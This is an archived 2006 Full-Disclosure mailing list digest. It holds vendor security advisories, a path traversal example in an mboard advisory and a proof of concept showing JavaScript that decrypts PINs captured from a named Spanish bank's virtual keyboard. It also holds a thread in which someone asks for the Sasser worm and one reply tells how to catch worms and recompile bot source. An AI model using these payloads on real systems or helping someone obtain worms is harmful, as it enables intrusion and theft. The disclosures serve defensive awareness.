[Full-disclosure] [ GLSA 200611-22 ] Ingo H3: Folder name shell command injection
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Ingo H3: Folder name shell command injection Date: November 27, 2006 Bugs: #153927 ID: 200611-22 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Ingo H3 is vulnerable to arbitrary shell command execution when handling procmail rules. Background == Ingo H3 is a generic frontend for editing Sieve, procmail, maildrop and IMAP filter rules. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/horde-ingo1.1.2= 1.1.2 Description === Ingo H3 fails to properly escape shell metacharacters in procmail rules. Impact == A remote authenticated attacker could craft a malicious rule which could lead to the execution of arbitrary shell commands on the server. Workaround == Don't use procmail with Ingo H3. Resolution == All Ingo H3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/horde-ingo-1.1.2 References == [ 1 ] CVE-2006-5449 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5449 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200611-22.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp7NHML4Yqpy.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cursor snarfing - a new class of vulnerability and attack in Oracle
Hey all, I've just written a paper detailing a fairly common PL/SQL programming error related to cursors that leads to a new class of vulnerability in Oracle. You can get a copy of the paper from http://www.databasesecurity.com/ . Cheers, David Litchfield NGSSoftware Ltd +44(0) 208 401 0070 http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anonymizing RFI Attacks Through Google
On Sat, Nov 25, 2006 at 01:01:54AM -0500, Dude VanWinkle wrote: On 11/25/06, endrazine [EMAIL PROTECTED] wrote: this process of attack is a mere waste of time if one only reaches anonymity : in order to give google this new url to crawl, you'd have to either create a web page that points to this very page, or enter the url in the google database directly using their form. None of those two options are safer than attacking the website directly (google might vey well log your actions), so what's the point ? a lot of people are used to seeing google spider tracks in their logs. anonymizing your attack via google may make the admin investigating the attack think that a malfunctioning web bot was responsible for the attack, or they may skim over the entire incident accidentally. Even if you are aware of an attack, the Google bot will not tell you where the attacking URL comes from. So, if you're investigating the hack, you have no data; you need to get Google to cooperate with you, so they can find where the URL came from, and then investigate from there. That adds Google as an additional cut-out and delays any investigation. -- Vincent ARCHER [EMAIL PROTECTED] Tel : +33 (0)1 40 07 47 14 Fax : +33 (0)1 40 07 47 27 Deny All - 23, rue Notre Dame des Victoires - 75002 Paris - France ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Defeating Image-Based Virtual Keyboards and Phishing Banks (fwd)
Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a post by HispaSec. This is about breaking virtual keyboards implementations, and the encryption some of them use (most of them send the data in clear text with the image). HispaSec was a reference by which we found the banks' site as one using a virtual keyboard. http://blogs.securiteam.com/index.php/archives/678 http://hispasec.com/laboratorio/cajamurcia_en.htm Gadi. Quoting: Recently, I stumbled upon a post by HispaSec showing off a screen shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely showed how a trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user's PIN number, fairly easily, and wondered why are they taking this approach when the PIN numbers can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are encrypted. Image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these trojan horses. The bad guys adapted to this technology and escalated. Now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. Thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed. Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the PIN number in cleartext, while others encrypt them, one such example is cajamurcia. Even when the encryption is used, banks tend to implement it badly making it easy to recover the PIN number from the encrypted form. I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you - this already posses a security problem - and this timestamp is then used to encrypt the PIN number you entered. This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number). PoC: A request to the server would look like: OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001 PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01 We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number. If we feed these into the following JS code: https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js function hexToString (h) { var r = ; for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) { r += String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r; } calcula = '1161006956'; ciphertext = hexToString('0xBBCB6E341C56C6B2'); var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, ); console.debug(cleartext); We will get our original PIN number. This isn't necessarily easier as it requires data capture, which isn't always easy, but screen captures usually require either an OCR, or manual labor, which the above code does not. One needs to remember that Javascript (or any client-side code and information) is indeed on the client's side and under the client's control. An attacker can kick it aside, or learn to emulate it and attack it - manipulate it. Client-side encryption where the code and key are visible is pointless. No matter how much obfuscation or cross-frame and cross-file scripting is used, calling for different functions and parameters, nor how many functions you obfuscate your code through, it can be read and maniuplated. We made several email and phone attempts over the past couple of months to reach cajamurcia and report this security issue to them. Gadi Evron even asked a couple of folks in Spain to help with contacting them by phone, even speaking directly to security folks there. We were unsuccessful. The bank is already under attack by the over-kill screenshot trojan horses. We release this information in full disclosure in the hope many online commerce sites using similar techniques or even sending the information in the clear will fix their implementations of the virtual keyboard Click-Me Number-Images Schemes. These are broken by the use of the trojan horses we discussed, but that's a whole other story. Noam Rathaus ___ Full-Disclosure - We
[Full-disclosure] Sasser or other nasty worm needed
I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MHL-2006-003 Public Advisory: mboard file creation issue
MHL-2006-004 - Public Advisory +---+ |mboard Security Issue | +---+ PUBLISHED ON November 26th, 2006 PUBLISHED AT http://www.mayhemiclabs.com/advisories/MHL-2006-004.txt http://www.mayhemiclabs.com/wiki/wikka.php?wakka=MHL2006004 PUBLISHED BY Mayhemic Labs http://www.mayhemiclabs.com security AT mayhemiclabs DOT com GPG key: 0x56143F84 APPLICATION MBoard - PHP message board http://www.phpjunkyard.com/php-message-board.php MBoard is a PHP message board script (a simple forum). AFFECTED VERSIONS Versions 1.22 and below ISSUES MBoard does not check the Post ID for malicious data when replying, allowing an attacker to create blank files on the system wherever the web server has write access. Example: An attacker can reply to a message, and edit the orig_id variable to something malicious (../../../../../../tmp/ZOMGHAX) mboard will then create the specified file (appending the configured extension. WORKAROUNDS Enabling Magic Quotes will negate the issue. SOLUTIONS Upgrade to version 1.3 REFERENCES MBoard - http://www.phpjunkyard.com/php-message-board.php TIMELINE October 11th, 2006 Vendor/Developer Notified Vendor/Developer Response Recieved October 25th, 2006 Vendor/Developer Followup Vendor/Developer Response Recieved November 16th, 2006 Vendor/Developer Followup November 18th, 2006 New Version Released November 26th, 2006 Advisory Released ADDITIONAL CREDIT N/A LICENSE Creative Commons Attribution-ShareAlike License http://creativecommons.org/licenses/by-sa/2.5 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The state of JavaScript Hacking
Please take my apologize if the following post has offended you in any way. The reason I posted it here is because I wanted to get this massage heard by a wider audience. What better place to talk about this than the security mailing lists. http://www.gnucitizen.org/blog/the-state-of-javascript-hacking/ In this post I would like to share a few thoughts with you about the importance of JavaScript and other under appreciate web technologies and their impact on the computer security industry and our lives in general. The purpose of this is to bring more light on the matter. Although this topic is becoming clearer now, I can still see quite a lot confused security professionals thriving to comprehend the core principles of these, relatively new, types of attacks. In this article I hope that I will be able to present my view as briefly and accurately as possible. As you might already know JavaScript is becoming more and more popular among Web developers. The reason for this sudden growth is AJAX which among other technologies brought some quite useful and exciting features. Historically, AJAX is nothing new. This technology has been known for ages although as I said earlier it has started being implemented on a large scale just recently. On of the biggest AJAX evangelist up to day is Google which I believe is responsible for the AJAX hype in general. This is just a personal opinion. AJAX and JavaScript are nothing new to security professionals, either. You can see that various attack vectors related to these technologies has been discovered in the past. I am not talking about browser vulnerabilities but pure design and implementation insecurities. Among them there are techniques such as XSS (a.k.a Cross-site scripting) and CSRF (a.k.a Cross-site request forgery). Both of them outline ways of performing information gathering, session hijacking and request forging. From the user prospective this is very serious but not that many companies have taken it seriously because they don't really understand them, I suppose. You are probably aware of XSS and CSRF because the state of JavaScript hacking today is based around them. However, because of them the security industry has never really understood their real potential. Simply put, performing session hijacking is not as interesting as sniffing the air and forging someone's requests is just not as fun as obtaining remote access. Will that change? What security professionals must understand is that JavaScript is not about web pages anymore. It is a technology that is currently overtaking every WEB frontline and the desktop too. JavaScript is used on servers, web pages and desktop applications. It is a bridge technology. WEB designers use JavaScript to glue visual elements while browser vendors glue desktops and servers. The technology is the same all over the place which means less coding. That results into less money spent. Very utopic I must say. If you have less overhead with developing desktop and web applications with JavaScript don't you think that attackers will have the same benefit? They can write cross-platformed viruses that can compromise desktop and web applications at the same time. Code once, destruct everywhere! Mozilla and Adobe are the biggest cheerleaders in this game. Microsoft is somewhere behind but they are quickly catching up. Mozilla with their XUL makes attackers life so much easier. It is not that the Mozilla browser is vulnerable to any specific type of attack but the past has already proved many times that eventually someone will find an issue with the architecture. Then people will find the same mistake in other places. The Mozilla XUL is considered a true RIA (Rich Internet Application) platform that is currently the base of many open source products. All of them support JavaScript, CSS, Flash (if installed) and Java (if installed). If the developers of these applications don't have deep understandings of the security implications of the Mozilla platform the WEB will become suddenly very dangerous place for them. Adobe on the other hand is making the process of creating a browser so transparent that everyone, I mean everyone, even your grandma will be able to create one in seconds. I am talking about Adobe's Apollo framework which is build on the top of Flex. If you haven't heard of it go and research now. Come back later. Don't get me wrong, I will probably use this platform to write a few security tools but just think about this for a second: developers will be able to write applications that will integrate the desktop with the WEB using already proven WEB technologies such as JavaScript, CSS, ActionScript, Flash and AJAX. I don't really know what Apollo's security model will be but apparently you can do whatever you want as long as the application is installed on the host environment. BTW, you install applications with a single click. Moreover, given the fact that Flash is so well spread, I am almost 90% sure that Adobe will
[Full-disclosure] rPSA-2006-0218-1 ImageMagick
rPath Security Advisory: 2006-0218-1 Published: 2006-11-27 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: ImageMagick=/[EMAIL PROTECTED]:devel//1/6.2.3.3-3.4-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5456 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4601 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0082 https://issues.rpath.com/browse/RPL-811 https://issues.rpath.com/browse/RPL-389 Description: Previous versions of the ImageMagick package contained multiple vulnerabilities. Attacker-supplied malformed image files may allow arbitrary code execution as the running user. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] rPSA-2006-0219-1 info install-info texinfo
rPath Security Advisory: 2006-0219-1 Published: 2006-11-27 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1 install-info=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1 texinfo=/[EMAIL PROTECTED]:devel//1/4.8-6.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4810 https://issues.rpath.com/browse/RPL-810 Description: Previous versions of the texinfo package can be caused to execute arbitrary code contained in an intentionally malformed texinfo file. These texinfo commands are often run automatically when building software packages. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] REMLAB Web Mech Designer 2.0.5 Path Disclosure Vulnerability
Description: REMLAB http://remlab.sourceforge.net/ is a fully fuctional cross-platform web-based Battlemech designer for the tactical board game Battletech http://www.classicbattletech.com/ . REMLAB is built entirely on HTML, PHP, and JavaScript with AJAX functionality. The vulnerability exists in calculate.php script which allows remote attackers to obtain sensitive information via an HTTP request to calculate.php that contains wrong value in Tonnage parameter. This causes the information to be leaked in an error message. External References: Mitre CVE: CVE-2006-5896 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5896 NVD NIST: CVE-2006-5896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-5896 OSVDB: 30264 http://www.osvdb.com/displayvuln.php?osvdb_id=30264 Summary: REMLAB is a fully fuctional cross-platform web-based Battlemech designer for the tactical board game Battletech. A security problem in the product allows attackers to gather the true path of the server-side script. Release Date: November 27 2006 Severity: Risk: Low CVSS Metrics Access Vector: Remote Access Complexity: Low Authentication: not-required Confidentiality Impact: Partial Integrity Impact: None Availability Impact: None Impact Bias: Normal CVSS Base Score: 2.3 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: Path disclosure. SecureScout Testcase ID: TC 17937 Vulnerable Systems: REMLAB Web Mech Designer 2.0.5 http://sourceforge.net/project/showfiles.php?group_id=165798 Vulnerability Type: Input Validation error - The calculate.php script has a flaw which leads to a Warning. This is an input validation fault when the script is not testing the data passed. Vendor Status: The Vendor has been contacted on November 14th 2006, by email and phone,. Vendor has not responded. There is no official patch at this time. Workaround: Disable warning messages: modify in the php.ini file the following line: display_errors = Off . Example: HTTP REQUEST http://[TARGET]/[REMLAB-directory]/include/calculate.php?Tonnage=%60 REPLY ... bWarning/b: Division by zero in b D:\WWWRoot\username\calculate.php/b on line b438/bbr / ,,0.00,,1,,2,,12,,12,,8,,8,,2,,2,,10,,0.0,,0.0 ... URL of Original Advisory: http://www.netvigilance.com/advisory0007 Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com http://www.netvigilance.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1219-1] New texinfo packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1219-1[EMAIL PROTECTED] http://www.debian.org/security/ Noah Meyerhans November 27, 2006 - Package: texinfo Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2005-3011 CVE-2006-4810 BugTraq ID : 14854 20959 Multiple vulnerabilities have been found in the GNU texinfo package, a documentation system for on-line information and printed output. CVE-2005-3011 Handling of temporary files is performed in an insecure manner, allowing an attacker to overwrite any file writable by the victim. CVE-2006-4810 A buffer overflow in util/texindex.c could allow an attacker to execute arbitrary code with the victim's access rights by inducing the victim to run texindex or tex2dvi on a specially crafted texinfo file. For the stable distribution (sarge), these problems have been fixed in version 4.7-2.2sarge2 Note that binary packages for the mipsel architecture are not currently available due to technical problems with the build host. These packages will be made available as soon as possible. For unstable (sid) and the upcoming stable release (etch), these problems have been fixed in version 4.8.dfsg.1-4 We recommend that you upgrade your texinfo package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.dsc Size/MD5 checksum: 622 f146d738696417a3f14e04875066ef9a http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7.orig.tar.gz Size/MD5 checksum: 1979183 72a57e378efb9898c9e41ca839554dae http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2.diff.gz Size/MD5 checksum:10614 07a591b00a79ba8e2acf13d7654bf3e8 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_alpha.deb Size/MD5 checksum: 207720 1fce59e479c10386d5bab3d8aec99ddd http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_alpha.deb Size/MD5 checksum: 884956 93a3606294fd0059390b7da3c5803a1a amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_amd64.deb Size/MD5 checksum: 191308 035c9fb7bffa818819e6e104218d5911 http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_amd64.deb Size/MD5 checksum: 863680 8300c746fbb75231a09229f32f57d126 arm architecture (ARM) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_arm.deb Size/MD5 checksum: 178812 d8781c075692500d4d6a799019697a72 http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_arm.deb Size/MD5 checksum: 848862 4d31ba02e3004a5e290d6204ba402b19 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_hppa.deb Size/MD5 checksum: 867668 934d2a72b73c4342066f1fba21c35fff http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_hppa.deb Size/MD5 checksum: 195122 07ea3515643ddb8dc29791802974ec40 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_i386.deb Size/MD5 checksum: 846972 eb370f53f4db1681ead784353f6711c4 http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_i386.deb Size/MD5 checksum: 179614 ee08c755b1eb00043173acfdae2420d7 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_ia64.deb Size/MD5 checksum: 912350 c99196682ffe5436a1f99da332e77f91 http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_ia64.deb Size/MD5 checksum: 229398 e9e6dca2f2250bd07c0605e393105339 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/t/texinfo/info_4.7-2.2sarge2_m68k.deb Size/MD5 checksum: 171354 93b5762ecf847bba77396f08b04e225e http://security.debian.org/pool/updates/main/t/texinfo/texinfo_4.7-2.2sarge2_m68k.deb Size/MD5 checksum: 838386 2d63f36ef81c84ae8bdad8f2be5f1797 mips architecture (MIPS (Big Endian))
Re: [Full-disclosure] Sasser or other nasty worm needed
Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [inbox] Sasser or other nasty worm needed
wow, the fastest way to catch any type of worm like that is to stick an unpatched, no A/V running, windows box out on the internet. You'll have so many bugs you won't know what to do with them all... Exibr -Original Message- From: kikazz [mailto:[EMAIL PROTECTED] Sent: Sunday, November 26, 2006 5:32 PM To: full-disclosure@lists.grok.org.uk Subject: [inbox] [Full-disclosure] Sasser or other nasty worm needed I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. You're kidding, right? .. just take a fresh install of Win2K and hook it to the Internet. Go get coffee. Come back in ~15min. Boot to BartPE (or Knoppix, etc) and look for anything new in %systemroot%. You'll probably have more than one. It'll be a binary though, probably packed/encrypted 3+ times (and that's annoying, but not impossible, to reverse-engineer). The source code for all the [SD|RX|AGO]bot variants is easily found on the web. Recompile in Visual Basic, pack with UPX (or whatever) and off you go. To prison that is... Meanwhile .. a quick look at your email : Received: from blueberry ( [69.3.80.94]) by mx.google.com with ESMTP id i20sm9690041wxd.2006.11.26.14.32.22; Sun, 26 Nov 2006 14:32:22 -0800 (PST) From: kikazz [EMAIL PROTECTED] suggests that you aren't a teacher at all .. network:IP-Network-Block:69.3.80.88 - 69.3.80.95 network:Org-Name:Compu' Counts Consulting Inc. network:Street-Address:6174 Darleon Place network:City:ALEXANDRIA network:State:VA network:Postal-Code:22310 sigh .. another consultant that is trying to get other folks to do his dirty work... Cheers, Michael Holstein CISSP GCIA Information Security Administrator Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd)
More than a year Old (3rd August, 2005) - Defeating CITI-BANK Virtual Keyboard Protection http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip http://xforce.iss.net/xforce/xfdb/21727 Regards, -d -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gadi Evron Sent: Sunday, November 26, 2006 12:18 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd) Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following up a post by HispaSec. This is about breaking virtual keyboards implementations, and the encryption some of them use (most of them send the data in clear text with the image). HispaSec was a reference by which we found the banks' site as one using a virtual keyboard. http://blogs.securiteam.com/index.php/archives/678 http://hispasec.com/laboratorio/cajamurcia_en.htm Gadi. Quoting: Recently, I stumbled upon a post by HispaSec showing off a screen shot trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which nicely showed how a trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user's PIN number, fairly easily, and wondered why are they taking this approach when the PIN numbers can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are encrypted. Image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these trojan horses. The bad guys adapted to this technology and escalated. Now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. Thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed. Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the PIN number in cleartext, while others encrypt them, one such example is cajamurcia. Even when the encryption is used, banks tend to implement it badly making it easy to recover the PIN number from the encrypted form. I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you - this already posses a security problem - and this timestamp is then used to encrypt the PIN number you entered. This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN number). PoC: A request to the server would look like: OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI VRS=001 PAN=2043123456 SELLO=16100616012569 CL=1161006956 PINV3=si PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01 We are only interested in PIN=BBCB6E341C56C6B2 and CL=1161006956, CL being the timestamp and PIN being the encrypted form of the PIN number. If we feed these into the following JS code: https://intelvia.cajamurcia.es/2043/01/scripts/MOD.js function hexToString (h) { var r = ; for (var i= (h.substr(0, 2)==0x)?2:0; i lowerthan h.length; i+=2) { r += String.fromCharCode (parseInt (h.substr (i, 2), 16)); } return r; } calcula = '1161006956'; ciphertext = hexToString('0xBBCB6E341C56C6B2'); var cleartext = des (calcula.substr(2,8), ciphertext, 0, 1, ); console.debug(cleartext); We will get our original PIN number. This isn't necessarily easier as it requires data capture, which isn't always easy, but screen captures usually require either an OCR, or manual labor, which the above code does not. One needs to remember that Javascript (or any client-side code and information) is indeed on the client's side and under the client's control. An attacker can kick it aside, or learn to emulate it and attack it - manipulate it. Client-side encryption where the code and key are visible is pointless. No matter how much obfuscation or cross-frame and cross-file scripting is used, calling for different functions and parameters, nor how many functions you obfuscate your code through, it can be read and maniuplated. We made several email and phone attempts over the past couple of months to reach cajamurcia and report this security issue to them. Gadi Evron even asked a couple of folks in Spain to help with contacting them by phone, even speaking
Re: [Full-disclosure] Sasser or other nasty worm needed
What am I Consultant? School Teacher? Terrorist? On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ 